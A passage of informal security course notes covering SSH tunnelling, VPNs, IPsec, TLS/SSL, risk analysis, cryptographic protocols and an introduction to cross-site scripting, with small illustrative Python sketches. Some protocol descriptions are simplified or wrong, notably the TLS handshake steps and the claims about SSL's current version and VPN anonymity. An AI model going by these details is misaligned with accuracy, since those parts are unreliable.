- easy tunnel set-up (you can create a new tunnel with a single ssh command on the client side)
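The CONNECT request and response formats described earlier can be sketched in code. The function names and the example host are assumptions for illustration; the sketch only builds and parses the messages and does not open any network connection.

```python
def build_connect_request(host, port, headers=None, version="HTTP/1.1"):
    """Build the bytes of a CONNECT request in the format shown above."""
    lines = [f"CONNECT {host}:{port} {version}"]
    header_map = {"Host": f"{host}:{port}"}
    header_map.update(headers or {})
    lines += [f"{name}: {value}" for name, value in header_map.items()]
    # Each line ends with <CR><LF>; an empty line ends the request.
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")

def parse_status_line(response: bytes):
    """Split '<http_version> <code> <message>' from the first response line."""
    status_line = response.split(b"\r\n", 1)[0].decode("ascii")
    version, code, *rest = status_line.split(" ", 2)
    return version, int(code), rest[0] if rest else ""

def tunnel_established(response: bytes) -> bool:
    """Following the notes: code 200 means the proxy now acts as a tunnel."""
    return parse_status_line(response)[1] == 200

request = build_connect_request("mail.example.com", 110)
print(request)
print(tunnel_established(b"HTTP/1.1 200 Connection established\r\n\r\n"))
print(tunnel_established(b"HTTP/1.1 403 Forbidden\r\n\r\n"))
```

After a positive response the client would simply start sending the tunnelled protocol's own bytes over the same connection.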

SSH Tunnelling
SSH (Secure Shell) is a protocol for creating a secure connection between two computers.
- Designed to replace Telnet and other insecure remote shells.
- Stream based tunneling.
- Provides authentication between end points.
- Provides encryption and integrity protection.
- Can be used to create tunnels through forwarding (as demonstrated in Question 2 of the VPN lab).
[Figure: Lab/TheoryReviewNote/ssh_tunnel.jpg]
1. User is not able to connect to the web server, but can ssh to an intermediary server.
2. User creates an ssh connection to the intermediary server and configures it to forward all incoming traffic to the web server.
3. User then forwards all web traffic on their system to the ssh client, which forwards it to the intermediary server.
4. The intermediary server forwards traffic to the web server and forwards any received data back to the user's computer through the ssh tunnel.

What is SSH Tunnelling?
SSH Tunnelling is a common and useful way to tunnel insecure TCP protocols such as POP3, SMTP and HTTP through a secure communication channel.

Example of SSH Tunnelling
A good example of this is that normal pop3 traffic travels over the network as plaintext. These packets may also contain confidential data such as usernames, passwords and plans on how to take over the world. Some people may be upset if they found out your diabolical plan, which would be quite possible with a simple packet sniff of the unencrypted data as it proceeds through the network. To prevent this, we can use an SSH TUNNEL. Yay! For example, say we decided that it was about time to use a secure connection to the mail server, rather than a simple, easily sniffable direct connection. This is achieved by establishing an SSH tunnel to the mail server with port forwarding.

ssh -L <local-port>:<destination-host>:<remote-port> <username@><remote-host>

The -L flag says that we are setting up a local port forward through <remote-host> using these settings:
- <local-port> is the unused local port that the mail client will now use to reach the mail server.
- <destination-host> is the host, as seen from <remote-host>, that the traffic is finally forwarded to (here, the mail server).
- <remote-port> is the proper port number for the service you wish to use; in this example pop3 is located on port 110.
- <username@> is used if the user on the remote host that we are connecting to has a different username.
- <remote-host> is the SSH server that we wish to bounce through with this tunnel.
This sets things up so that the mail traffic from your computer goes to the new local port that you set up with the ssh connection, e.g. port 6222. The port forwarding set up via the SSH tunnel forwards the traffic from local port 6222, through the encrypted connection, to the POP3 port on the mail server. After setting the mail client to go through localhost:<local-port>, the pop3 traffic is encrypted as it passes through the SSH tunnel; it is therefore no longer in plaintext and is much harder to break, thanks to SSH's use of public and private keys. Because SSH is such a substantial protocol and allows users to tunnel through firewalls, it can pose a serious security risk, which will be brought up later.
Pros
- Easy to set up. Just requires an SSH daemon to be running on the intermediary server.
Cons
- The intermediary server must be reachable through the network.
- Firewalls can be routed around using SSH tunnels. This poses a potential security risk.

Virtual Private Network (VPN)


What is a VPN?
A virtual network using shared public networking infrastructure (such as the Internet) to emulate the properties of an actual private network. It is a virtual network which is created based on a tunneling protocol. It is more than just tunneling through a port (like an ssh tunnel), as a VPN is an entire virtual network, created on top of a public network. Just like in real networks, two computers on a VPN can communicate freely with each other (for example by pinging).
A VPN is a computer network in which some of the links between nodes are carried by open connections or virtual circuits in some larger network (e.g., the Internet) instead of by physical wires. The link-layer protocols of the virtual network are said to be tunneled through the larger network when this is the case. One common application is secure communications through the public Internet, but a VPN need not have explicit security features, such as authentication or content encryption. VPNs, for example, can be used to separate the traffic of different user communities over an underlying network with strong security features.
A VPN may have best-effort performance, or may have a defined service level agreement (SLA) between the VPN customer and the VPN service provider. Generally, a VPN has a topology more complex than point-to-point.
Tunneling protocols can be used in a point-to-point topology that would generally not be considered a VPN, because a VPN is expected to support arbitrary and changing sets of network nodes. Since most router implementations support a software-defined tunnel interface, customer-provisioned VPNs are often simply a set of tunnels over which conventional routing protocols run. Provider-provisioned VPNs (PPVPNs), however, need to support the coexistence of multiple VPNs, hidden from one another, but operated by the same service provider.

Why VPN?
VPN is currently the most advanced form of anonymity and data security for use on the Internet. VPN users often have dynamic IP addresses and can have a different IP address with every connection that they make. The main difference between an SSL or SSH encrypted tunnel proxy and VPN (Virtual Private Network) tunnelling is that VPN doesn't use a proxy, and anonymizes and encrypts all activities. Both SSL and SSH encryption can be used with VPN as well as with proxy servers.
VPN provides:
- Authentication before VPN connection
- Trusted delivery networks
- Security mechanisms in the VPN
- Security and mobility
To sum up:

- Private networks (e.g. leased lines) are expensive
- VPNs emulate the properties of private networks
  - Improved security
    - protected from unauthorized access (authorization)
    - confidentiality (data encryption)
    - traffic protected from non-VPN users (authentication)
  - Predictable performance
    - reliability
    - low latency, low loss
    - bandwidth guarantees
- Independent choice of network transport technologies
- Independent IP address space

TUN/TAP Driver
VPNs use simulated network adapters known as TUN/TAP adapters. These adapters are simulated by a kernel driver, and the OS delivers all packets which are sent to or received from these adapters to the associated running VPN program, which decides what to do with the packets. There are 2 kinds of adapter, which serve different purposes:
- TUN: this simulated adapter is mainly used for routing and operates on layer 3 packets (such as IP packets). This is commonly used for merging two sites into a single network.
- TAP: this simulated adapter is mainly used for network bridging and operates on layer 2 frames (such as Ethernet frames). This is commonly used for connecting individuals to a certain virtual network.

Types of VPNs
There are two main types of VPN:
Routing mode
Used to merge two sites. This VPN uses the TUN driver. This type of VPN can be used to merge two networks which are separated physically, for example combining an office network in the US and an office network in Australia.
[Figure: Lab/TheoryReviewNote/VPNsiteTosite.png]
Network Bridging mode
Used to connect an individual to a network. This VPN uses the TAP driver. This type of VPN can be used to connect an individual to the main network, for example to play games which only support local area network connections with friends across the internet. There are some commercial VPNs of this type available, such as Hamachi.
(Figure: Lab/TheoryReviewNote/VPNnetworkbridge.png)
Network Bridging VPN Architecture
The VPN setup consists of:
VPN Server
This userspace program acts as a network bridge for all VPN Client programs in that virtual network. All packets sent by and received from a VPN Client go through this userspace program.
VPN Client
This userspace program handles all packets which travel to or from the associated TAP adapter.
In the case of an incoming packet: the VPN Client receives the packet from the opened port and injects it into the network stack of the associated TAP adapter. This effectively simulates an incoming packet from that TAP adapter.
(Figure: Lab/TheoryReviewNote/incomingDataTAP.png)
In the case of an outgoing packet: whenever a packet is sent to the TAP adapter, the OS passes it to the associated VPN Client, which then forwards it to the VPN Server.
(Figure: Lab/TheoryReviewNote/outgoingDataTAP.png)

Tunneling Protocols used by VPN
Multi-Protocol Label Switching (MPLS) is often used to overlay VPNs, often with quality of service control over a trusted delivery network.
Layer 2 Tunneling Protocol (L2TP) is a standards-based replacement for two proprietary VPN protocols, Cisco's Layer 2 Forwarding (L2F, now obsolete) and Microsoft's Point-to-Point Tunneling Protocol (PPTP), and a compromise taking the good features from each.
L2TPv3 (Layer 2 Tunneling Protocol version 3) is a newer release of L2TP.
IPsec (IP security) is commonly used over IPv4, and is a "standard option" in IPv6.
SSL/TLS is used either for tunneling the entire network stack, as in the OpenVPN project, or for securing what is, essentially, a web proxy. SSL is a framework more often associated with e-commerce, but it has been built upon by a number of vendors to provide remote access VPN capabilities. A major practical advantage of an SSL-based VPN is that it can be accessed from locations that restrict external access to SSL-based e-commerce websites only, a restriction that prevents VPN connectivity using IPsec protocols. SSL-based VPNs are vulnerable to trivial Denial of Service attacks mounted against their TCP connections, because the latter are inherently unauthenticated.
OpenVPN is an open-source VPN. It is a variation of SSL-based VPN that is capable of running over UDP. Clients and servers are available for all major operating systems.
MPVPN (Multi Path Virtual Private Network).

VPN Quarantine
The client machine at the end of a VPN could be a threat and a source of attack; this has no connection with VPN design and is usually left to system administration efforts. There are solutions that provide VPN Quarantine services, which run end point checks on the remote client while the client is kept in a quarantine zone until it is found healthy. Microsoft ISA Server 2004/2006 together with VPN-Q 2006 from Winfrasoft, or an application called QSS (Quarantine Security Suite), provide this functionality.

VPN Methods
remote-access VPNs (user-to-LAN)
scenario: employees of a company connect to the company's LAN from various remote locations using VPNs.

site-to-site VPNs (LAN-to-LAN)
Intranet-based scenario: a company has one or more remote locations that it wishes to join in a single VPN.
Extranet-based scenario: a company that has a close relationship with another company (for example, a partner, supplier or customer) can build an extranet VPN, which allows all of the various companies to work in a shared environment.

VPN implementation
tunnelling: a secure channel for end-to-end data transmission; the process of placing an entire packet within another packet and sending it over a network
  Carrier protocol - The protocol used by the network that the information is traveling over
  Encapsulating protocol - The protocol (GRE, IPSec, L2F, PPTP, L2TP) that is wrapped around the original data
  Passenger protocol - The original data (IPX, NetBEUI, IP) being carried
authentication: of the two end points of a secure channel
encryption
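The three protocol roles in tunnelling can be illustrated with a small sketch. This is only a toy model: the Packet class and the encapsulate and decapsulate helpers are hypothetical names invented for illustration, and no real header formats are produced.

```python
from dataclasses import dataclass


@dataclass
class Packet:
    protocol: str    # name of the protocol this packet belongs to
    payload: object  # raw bytes, or another Packet when encapsulating


def encapsulate(passenger: Packet, encapsulating: str, carrier: str) -> Packet:
    """Wrap the passenger packet in an encapsulating layer, then in a carrier packet."""
    tunnel_layer = Packet(protocol=encapsulating, payload=passenger)
    return Packet(protocol=carrier, payload=tunnel_layer)


def decapsulate(outer: Packet) -> Packet:
    """Strip the carrier and encapsulating layers to recover the passenger packet."""
    return outer.payload.payload


# Passenger: an IPX packet. Encapsulating protocol: GRE. Carrier protocol: IP.
original = Packet("IPX", b"hello")
on_the_wire = encapsulate(original, encapsulating="GRE", carrier="IP")
recovered = decapsulate(on_the_wire)
```

The network in the middle only ever sees the outer IP packet; the IPX packet travels untouched inside it and is recovered intact at the far end of the tunnel.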

IP Security (IPSec)
A series of standards which provides enhanced security features (confidentiality, integrity, authentication) at the IP layer (layer 3). It can provide tunneling through IPsec Tunnel mode.
IPSec is an internet security protocol that operates at the network layer, whereas most security protocols operate at the transport layer or higher. This allows IPSec to be simultaneously more and less flexible than the other available protocols.
(Figure: JamesLennox/IPSec/Bsd_IPsec.png)
Firstly, because it sits at the network layer, everything above the IP level is encrypted. There is therefore no distinction between TCP, UDP or other transport layer protocols. All traffic for the intended destination (that which would travel through the tunnel) is encrypted without the knowledge or cooperation of the program controlling the stream. This is a great advantage compared to protocols such as SSL, which require explicit cooperation from the application and must be factored into the protocol design.
On the other hand, this also provides somewhat less flexibility than application level protocols. Because IPSec is established between the local host and a secure gateway, there is no way to ensure that all traffic from an application will be delivered through the encrypted tunnel. By contrast, when encryption is worked into the application protocol, communication is secured without the need to create a tunnel separately, and it is secured all the way, not simply between the end-points of the tunnel.
(Figure: JamesLennox/IPSec/IPSec.jpg)
IPSec secures traffic only between the two end points of the tunnel. Within that span, however, it provides traffic security and integrity. It generally uses IKE (the Internet Key Exchange) to set up a group of parameters for the connection. These include things like the type of encryption protocol that is to be used, and the hosts involved.
The advantages of this particular method are:
Encrypting all traffic (cannot eavesdrop)
Integrity validation (ensuring it has not been modified)
Authentication of peers (ensures it is from the intended peer)
Anti-replay (cannot use a replay attack of a secure session)
There are two IPsec modes:
Transport: Only the payload is encrypted, and the IP header is hashed for integrity. This means, however, that the traffic cannot pass through NAT enabled routers, as they modify the header and invalidate the hash. It is therefore mainly intended for IPv6, but has yet to properly take off.
Tunnel: The most common form of IPsec, which lends itself perfectly to VPNs. In tunnel mode all traffic is encrypted, even the original IP header, and thus the packet must be encapsulated again. This allows it to be forwarded through firewalls etc., as the original IP header is no longer important to the transmission. It also means that on de-capsulation (and decryption) the packet is routed as if coming from the receiving machine, allowing local network traffic to be simply and securely tunneled over the internet.
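The NAT problem described for transport mode can be illustrated with a keyed hash over the addresses and payload. This is a minimal sketch and not the real IPsec packet format: the key, the addresses and the integrity_tag helper are all hypothetical, and HMAC-SHA256 simply stands in for whatever integrity algorithm the peers negotiated.

```python
import hashlib
import hmac

KEY = b"shared-secret"  # hypothetical key agreed by the two peers


def integrity_tag(src_ip: str, dst_ip: str, payload: bytes) -> bytes:
    """Keyed hash covering the IP addresses as well as the payload."""
    data = src_ip.encode() + b"|" + dst_ip.encode() + b"|" + payload
    return hmac.new(KEY, data, hashlib.sha256).digest()


def verify(src_ip: str, dst_ip: str, payload: bytes, tag: bytes) -> bool:
    """Recompute the tag at the receiver and compare in constant time."""
    return hmac.compare_digest(integrity_tag(src_ip, dst_ip, payload), tag)


payload = b"application data"
tag = integrity_tag("192.168.1.10", "203.0.113.5", payload)

# Delivered unchanged: the tag verifies.
unchanged_ok = verify("192.168.1.10", "203.0.113.5", payload, tag)

# A NAT router rewrote the private source address to its public one:
# the receiver hashes a different header, so verification fails.
after_nat_ok = verify("198.51.100.7", "203.0.113.5", payload, tag)
```

In tunnel mode the protected packet is wrapped in a fresh outer header, so a change to the outer addresses does not touch the data covered by the check.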

Transport Layer Security (TLS) / Secure Socket Layer (SSL)


What is TLS/SSL
SSL (Secure Socket Layer)
when: protocol developed by Netscape in 1996, current version is 3.0
where: it runs above the transport layer, in the application layer
goals: provide privacy and reliability between two communicating applications
provides encryption, server and client authentication, and message authentication
TLS (Transport Layer Security)
when: defined in 1999 as version 1.0 (later versions have since been published)
more or less the same as SSL, while providing more security

Algorithms involved
The major steps and the protocols involved are:

Step  Purpose                              Typical protocols
1     Cipher negotiation
2     Key exchange                         RSA, Diffie-Hellman, ECDH, SRP, PSK
3     Authentication                       RSA, DSA, ECDSA
4     Symmetric cipher                     RC4, Triple DES, AES, IDEA, DES
5     Message Authentication Codes (MACs)  HMAC-MD5 / HMAC-SHA for TLS, or MD5 / SHA for SSL

How it works
There are two scenarios: server-only authentication and mutual authentication (both server and client are authenticated). The mutual authentication case proceeds as follows:
1. Client -> Server: requests a secure channel, sending the list of ciphers and hash functions it supports.
2. Server -> Client: picks the strongest cipher and hash function from the list and notifies the client of the choices.
3. Server -> Client: sends its digital certificate, which includes the server name, the trusted certificate authority (CA), and the server's public encryption key.
4. Server -> Client: requests the client's certificate.
5. Client: contacts the server that issued the certificate (the trusted CA above) and confirms that the certificate is authentic, or else terminates.
6. Client -> Server: sends its certificate, together with the last message from the server encrypted with the client's private key.
7. Server: verifies the client by decrypting that message with the client's public key.
8. Client -> Server: creates a random session key (a symmetric key) and sends it encrypted with the server's public key.
9. Server: decrypts it using its private key and obtains the session key.
Both sides are now ready to communicate using the symmetric session key.

Protocols involved
Handshake protocol: responsible for creating secure communication between client and server
Record protocol: defines the actual exchange packet formats:
  ChangeCipherSpec
  Alert
  Handshake
  Application

How the data packet is generated
Fragmentation
The data is fragmented into SSLPlaintext records of 2^14 bytes or less.
Compression
In this phase, the compression algorithm defined in the Handshake stage compresses the given SSLPlaintext. Compression must not lose any data. The result is called SSLCompressed. The SSLCompressed length must not exceed 2^14 + 1024.
Applying MAC (Message Authentication Code)
In this phase a MAC, which is defined in the Handshake stage, is attached to the SSLCompressed. The MAC is computed as follows:
MAC-DATA = HASH ( MAC-WRITE-SECRET, PAD2, HASH ( MAC-WRITE-SECRET, PAD1, SEQUENCE-NUMBER, SSLCompressed.type, SSLCompressed.length, SSLCompressed.fragment ) )
The hash algorithm used to compute the MAC derives from the cipher suite. The MAC-WRITE-SECRET is a secret value shared between the client and server. PAD1 is the byte 0x36 repeated 48 times for MD5 and 40 times for SHA. PAD2 is the byte 0x5C repeated the same number of times as PAD1. The SEQUENCE-NUMBER functions as a counter. Each party has two counters, one for transmitted messages and one for received ones. Every time a message is sent the counter is incremented. When a change-cipher-spec message is sent or received the counter is set to zero.
SSL supports 2 hash function algorithms:
MD5, a 128-bit hash.
SHA (Secure Hash Algorithm), a 160-bit hash.
Encryption
There are 2 types of cipher algorithms used in this section: a stream cipher and a block cipher. When a stream cipher algorithm is used no padding is required. When a block cipher is used, the data block needs to be a multiple of the block size; if it is not, padding is added to bring the length of the data block up to a multiple of the cipher's block size. The total length after encryption must not exceed 2^14 + 2048.

What attacks does it prevent
Identity fraud
Garbling attacks
Replaying messages
Cut and paste attacks
CipherSuite rollback attacks
Version rollback attacks
Dictionary attacks
Traffic attacks
Short-block attacks

Deployment
Visa, MasterCard, American Express and many leading financial institutions have endorsed SSL for commerce over the Internet.
It is widely integrated with most modern web browsers (IE, Firefox, Opera, Safari).

Comparison of protocols
Layers: Application Layer, Session Layer, Transport Layer, Network Layer, Data Link Layer
Datagram-based: IPSec, IPV6, GRE; PPPoE/PPPoA, PPTP, L2TP
Stream-based: TLS/SSL, SSH; SOCKS
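The MAC-DATA formula given earlier in this section can be sketched with Python's hashlib. The ssl3_mac function name is made up for illustration, and the field widths used here (an 8-byte sequence number, a 1-byte type, a 2-byte length) are an assumption taken from the SSL 3.0 specification rather than from these notes. It illustrates the formula only; SSL 3.0 itself should not be used in new systems.

```python
import hashlib
import struct

PAD_LENGTHS = {"md5": 48, "sha1": 40}  # repetitions of the pad byte per hash


def ssl3_mac(hash_name: str, mac_write_secret: bytes, seq_num: int,
             record_type: int, fragment: bytes) -> bytes:
    """Compute HASH(secret, PAD2, HASH(secret, PAD1, seq, type, length, fragment))."""
    pad1 = b"\x36" * PAD_LENGTHS[hash_name]
    pad2 = b"\x5c" * PAD_LENGTHS[hash_name]

    inner = hashlib.new(hash_name)
    inner.update(mac_write_secret + pad1)
    inner.update(struct.pack(">Q", seq_num))        # SEQUENCE-NUMBER (assumed 64-bit)
    inner.update(struct.pack(">B", record_type))    # SSLCompressed.type
    inner.update(struct.pack(">H", len(fragment)))  # SSLCompressed.length
    inner.update(fragment)                          # SSLCompressed.fragment

    outer = hashlib.new(hash_name)
    outer.update(mac_write_secret + pad2 + inner.digest())
    return outer.digest()


secret = b"k" * 16              # hypothetical MAC-WRITE-SECRET
record = b"GET / HTTP/1.0\r\n"  # hypothetical compressed fragment
mac_first = ssl3_mac("md5", secret, 0, 23, record)
mac_second = ssl3_mac("md5", secret, 1, 23, record)
mac_sha = ssl3_mac("sha1", secret, 0, 23, record)
```

Because the sequence number is hashed in, the same record sent twice produces two different MACs, which is what lets the receiver reject replayed records.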

Week8/NiceNotes
Risk
What is Risk?
Exposure to the chance of injury or loss
Something that might endanger you
Uncertainty that you don't like
Humans are bad at risk
You could completely ignore risk and most of the time you would be lucky. But what about the other times?

Terminology

Flaw - Something that's wrong
Vulnerability - Something that's wrong and exploiting it could be really bad
Threat - Way of exploiting a vulnerability
Impact - How serious it will be if a vulnerability is exploited
Risk - Likelihood * impact (cost)

Measuring Risk:
Expected value (average)
Lottery tickets - people like the large standard deviation
Unlikely events are not well represented in historical data (basically we haven't got a clue how to measure them accurately)
Use the NIST framework for measuring risk
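The expected value and standard deviation mentioned above can be worked through for a lottery ticket. The ticket price, prize and odds below are invented purely for illustration.

```python
import math


def expected_value(outcomes):
    """outcomes: list of (probability, value) pairs whose probabilities sum to 1."""
    return sum(p * v for p, v in outcomes)


def standard_deviation(outcomes):
    """Spread of the outcomes around the expected value."""
    mean = expected_value(outcomes)
    return math.sqrt(sum(p * (v - mean) ** 2 for p, v in outcomes))


# Hypothetical lottery: a $1 ticket with a 1-in-1,000,000 chance of a $500,000 prize.
p_win = 1 / 1_000_000
ticket = [(p_win, 500_000 - 1), (1 - p_win, -1)]

ev = expected_value(ticket)      # about -0.50: on average you lose 50 cents
sd = standard_deviation(ticket)  # about 500: hugely larger than the average loss
```

The average outcome is a small loss, but the spread is around a thousand times larger, which is the "large standard deviation" that makes the ticket attractive.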

Risk as a Cycle:
1. Lots of crime occurring, therefore increase security
2. Lots of security, therefore no crime
3. No crime, therefore why are we spending so much money on security?
4. Decrease security, which eventually results in increased crime
5. Back to step 1.

Risk vs Uncertainty:
What could happen?
What is the chance of that happening?
People are more uncertainty-averse than risk-averse

Dealing with Risk


We can't avoid risk completely, so we need to distribute our resources wisely to deal with the most serious risks. The options are:
Avoid the risk
Mitigate the risk - reduce the impact (how bad it can be) or reduce the chance of it happening (e.g. in investment, distribute your assets over a range of companies/resources, rather than going all in on one company)
Transfer the risk - give the risk to someone else (e.g. through insurance)
Accept the risk
Safety-critical systems (if one thing fails, everything fails):
Probabilistic safety (2 parachutes)
Inherent safety (designed in such a way that it is forced to be safe, e.g. a traffic light design with a wire that makes it physically impossible for the lights to go green in opposing directions)
Fail-safe - if something fails you're okay
Fault tolerance - fail-over systems, backups
Dual control: front room and back room people are different (and separated)

Risk Analysis & Management:


Exam Question:

CSE is downsizing and staff are told that 40% will lose their jobs in x months.
Risk: disgruntled staff could do something malicious (e.g. steal data)
Solution: avoid, mitigate, transfer, accept
Deal with the risk:
How can you prevent this happening?
How can you reduce the impact?
How can you detect the risk?
What do you want to happen?
Dealing with unknowns:
If dealing with a situation of unknowns:
Write down everything that could go wrong
Try and assign a likelihood to each (e.g. not likely, likely, very likely)
Try and assign an impact to each (e.g. not serious, serious, very serious)
Focus on the very likely and very serious ones!
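The "dealing with unknowns" procedure can be sketched as a small risk register that ranks entries by likelihood * impact. The numeric 1 to 3 scale and the three example risks are assumptions made up for illustration; they are not part of the exam question.

```python
# Assumed numeric scale for the qualitative labels used above.
LIKELIHOOD = {"not likely": 1, "likely": 2, "very likely": 3}
IMPACT = {"not serious": 1, "serious": 2, "very serious": 3}


def score(risk):
    """Risk = likelihood * impact for a (name, likelihood, impact) tuple."""
    _, likelihood, impact = risk
    return LIKELIHOOD[likelihood] * IMPACT[impact]


def rank_risks(risks):
    """Return the risks sorted from highest to lowest score."""
    return sorted(risks, key=score, reverse=True)


# Hypothetical entries for the downsizing scenario.
risks = [
    ("staff member deletes files on their last day", "likely", "serious"),
    ("staff member copies customer data", "very likely", "very serious"),
    ("staff morale drops", "very likely", "not serious"),
]
ranked = rank_risks(risks)
top_priority = ranked[0][0]
```

The very likely and very serious entry comes out on top, so that is where avoidance, mitigation or transfer effort would go first.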

PKI:
Problem with public key crypto - trust
PKI: trusted 3rd parties (CAs)
Homework:
1. Research the following and determine "what went wrong?"
* Chernobyl
* The China Syndrome (Three Mile Island)

Protocol
A protocol is the set of rules governing how two or more parties can communicate and interact.

What is a protocol?
Like an algorithm, but with multiple parties communicating
Algorithm: a set of precise steps starting from a known starting state and ending with a specific result

Secret splitting:
How can you have 2 people each knowing part of a secret, but neither knowing any information until they come together and share what they know?
XOR the secret with a random string. Give person 1 the result of the XOR and person 2 the random string. (Neither will know the secret until they swap what they know.)
Encrypt it with everyone's public key (problem: you need to be able to trust everyone not to cheat)
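The XOR approach to secret splitting can be sketched in a few lines. The function names and the example secret are hypothetical; the random string must be as long as the secret and must come from a cryptographically secure source.

```python
import secrets


def split_secret(secret: bytes):
    """Return two shares; each one alone is indistinguishable from random bytes."""
    random_string = secrets.token_bytes(len(secret))
    xored = bytes(s ^ r for s, r in zip(secret, random_string))
    return xored, random_string  # person 1 gets xored, person 2 gets random_string


def combine(share1: bytes, share2: bytes) -> bytes:
    """XOR the two shares together to recover the secret."""
    return bytes(a ^ b for a, b in zip(share1, share2))


share1, share2 = split_secret(b"launch code 1234")
recovered = combine(share1, share2)
```

Since x XOR r XOR r = x, combining the shares gives back the secret, while either share on its own reveals nothing except the secret's length.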

Cryptographic Protocols:

Session hijacking
Self-enforcing protocols are preferred
Subliminal channels (sometimes protocols can have these)
How do you stop a covert channel?
Coin tossing over a phone (doing it the normal way, you can't trust that it is done fairly):
1. Each party creates a message whose last bit corresponds to heads or tails (e.g. 1 for heads, 0 for tails).
2. Each party hashes its message (using a cryptographic hash, i.e. one for which it is infeasible to find 2 different messages that produce the same hash) and sends the hash to the other.
3. Each party then reveals its message, and the other checks it against the hash received earlier.
To cheat, a party would have to find a different message with the same hash, which is a second pre-image attack.
Homework
2. How can you extend the "you cut, I choose" cake protocol to 3 people?
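The coin tossing protocol above can be sketched with SHA-256 as the cryptographic hash. The notes do not say how the two bits are combined into a result, so the XOR rule in toss is an assumption, as are the function names and the 32-byte message length.

```python
import hashlib
import secrets


def make_message(bit: int) -> bytes:
    """Random 32-byte message whose last bit encodes the choice (1 = heads, 0 = tails)."""
    body = bytearray(secrets.token_bytes(32))
    body[-1] = (body[-1] & 0xFE) | bit
    return bytes(body)


def commit(message: bytes) -> bytes:
    """The hash that is sent to the other party before anything is revealed."""
    return hashlib.sha256(message).digest()


def verify(message: bytes, commitment: bytes) -> bool:
    """Check a revealed message against the hash received earlier."""
    return hashlib.sha256(message).digest() == commitment


def toss(message_a: bytes, message_b: bytes) -> int:
    """Assumed outcome rule: XOR of the two last bits (1 = heads, 0 = tails)."""
    return (message_a[-1] & 1) ^ (message_b[-1] & 1)


# Steps 1 and 2: each side picks a bit and exchanges hashes.
alice_msg, bob_msg = make_message(1), make_message(0)
alice_hash, bob_hash = commit(alice_msg), commit(bob_msg)

# Step 3: both reveal, and each checks the other's message.
both_honest = verify(alice_msg, alice_hash) and verify(bob_msg, bob_hash)
result = toss(alice_msg, bob_msg)

# Changing the chosen bit after committing no longer matches the hash.
changed = alice_msg[:-1] + bytes([alice_msg[-1] ^ 1])
cheat_detected = not verify(changed, alice_hash)
```

The random bytes in front of the chosen bit matter: without them there would be only two possible messages, and the other side could recover the choice simply by hashing both.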

Some examples of protocols would be:
TCP/IP
FTP
Telnet
SSH
POP3
A cryptographic protocol defines the way secret messages are sent and received between parties. Cryptographic protocols are usually defined with many purposes in mind, depending on the situation. Some examples of cryptographic protocol use would be to:
Exchange secret information
Achieve a transaction (Electronic Commerce)
Authenticate one, some or all the agents
Vote
Protect copyright on digital content
Some things cryptographic protocols address:
Non-Repudiation: prevent one of the parties later denying that they sent the message
Authentication: so that you can identify the sender
Confidentiality: so that you can encrypt the contents of the message

Attacks on Cryptographic Protocols


Some examples of attacks on cryptographic protocols would be:
Known-key attack: Specific key deduced by obtaining keys used previously
Replay: Communication sequence recorded and re-used later to violate security
Impersonation: Adversary assumes identity of a legitimate party
Dictionary attack: List of probable values successfully matched against specific value
Forward search: Similar to dictionary attack, used for decrypting a secret
Interleaving attack: Unauthorized messages substituted into an authorized sequence

Cross-site Scripting (XSS)


A script is a series of instructions, written in text, and interpreted by some scripting runtime. By this point, we've all seen at least half a dozen scripting languages: Perl, PHP, Bash, JSP, ASP, JavaScript, Python (arguably), Windows PowerShell (if you're unlucky), VBScript (if you're really unlucky), etc. In a web context, these break down into two categories: client-side and server-side scripts, depending on where they're executed.

Server-side scripting
Server-side scripting is used by webservers as a means of generating dynamic content. CGI is a simple example: the server, when given a request to a CGI app, will execute that app, and feed its output back to the client. PHP, JSP and ASP are all scripting languages designed specifically for server-side applications, and Perl is a general-purpose scripting language with a large array of libraries and modules for this purpose. This might seem a simple concept, but the web as we know it today wouldn't exist without server-side scripting. Scripts can do anything, from consulting a webpage index (such as in a search engine), to accessing bank account data (as on an Internet banking site), to generating graphs of the latest minute-to-minute share-trading data, or inserting large blocks of text into a hyperfast database (as in a blogging site).

Client-side scripting
Client-side scripting is the major driving technology behind the DHTML movement from the 90s, as well as its Web 2.0 reincarnation. In this case, the server sends a webpage with some embedded script (generally in JavaScript, but some [evil] websites use VBScript). The user's browser, noticing the <SCRIPT> tags, then starts the appropriate interpreter (if available), and executes the script. In the DHTML days this was mainly used for client-side form-input validation (we've all seen those hideously irritating "you must insert a number" message boxes on web forms) and making page elements change color, pop, and explode in response to user input. With the advent of faster computers, more powerful JavaScript runtimes, and the Web 2.0 concept, client-side scripting now also forms the basis of a substantial (and growing) number of web-based applications, in which an entire app exists within a small number of web pages whose content radically changes, much like a regular desktop app. Shining examples include Google's offerings (particularly GMail, Google Calendar, and Google Docs) and New Facebook.

The Scripting Problem


With great power, comes great responsibility. Scripting is extremely powerful, but it has a fundamental problem: you, as a user, are downloading and executing completely untrusted code from a remote machine, and it's often being executed without any interaction with you, with your user account's privileges. Worse, most Microsoft Windows users are administrators by default - meaning they have privileges equivalent to the UNIX root user (no self-respecting UNIXer, by contrast, would ever run Firefox as root without an insanely good reason). Remote system-level untrusted code execution. The biggest security nightmare in the known universe. And the gooiest candy an attacker could possibly desire.

Of course, this isn't quite as bad as it sounds. Modern browsers run scripts in a 'sandbox' that heavily restricts their actions. Moreover, client-side scripting languages can only do dangerous things (such as access the filesystem, or modify registry settings) with some difficulty (unless you use Microsoft Internet Explorer, have a site using VBScript, and have allowed some rogue ActiveX control to run...). And indeed, this has been highly successful in protecting web users from malicious websites. Basic cross-site exploits are also guarded by browsers, by forbidding scripts from contacting servers outside their domain of origin - so, for example, a script on mail.google.com wouldn't be able to contact evil.hacker.com, but might be able to talk to calendar.google.com (if it's lucky).

Cross-site scripting
Cross-site scripting is a different breed of attack. Rather than taking advantage of a vulnerability in client-side scripting engines, XSS focuses on servers. XSS attacks subvert a web application, causing its users to unwittingly leak information into the attacker's waiting hands. At its root, an XSS vulnerability is a server-side hole which allows web application users to inject code into server-generated pages, potentially causing other users to execute them as if they had come from the application itself. Ultimately, an XSS vulnerability is the same as any other vulnerability: how do we distinguish between code and data?

Type Of XSS Attacks


Non-Persistent
Also known as reflected XSS. Malicious code is reflected back from the server in response to some input. Typically requires some form of social engineering as well, since code would normally affect only immediate local pages. Example: Use a link embedded with some malicious code, and convince other users to visit said link.

Persistent
Also known as stored XSS. Malicious code is stored on the server and then sent to other users. Commonly found on sites where input is stored on the server, e.g. blogs and message boards. Example: Post some malicious code on a vulnerable message board, which ends up being executed by all users who view that post.

Defence Against XSS Attacks


Server Defence
Server defence aims to stop malicious code being injected into the web application. Every single input that a user provides should be checked.
Escaping
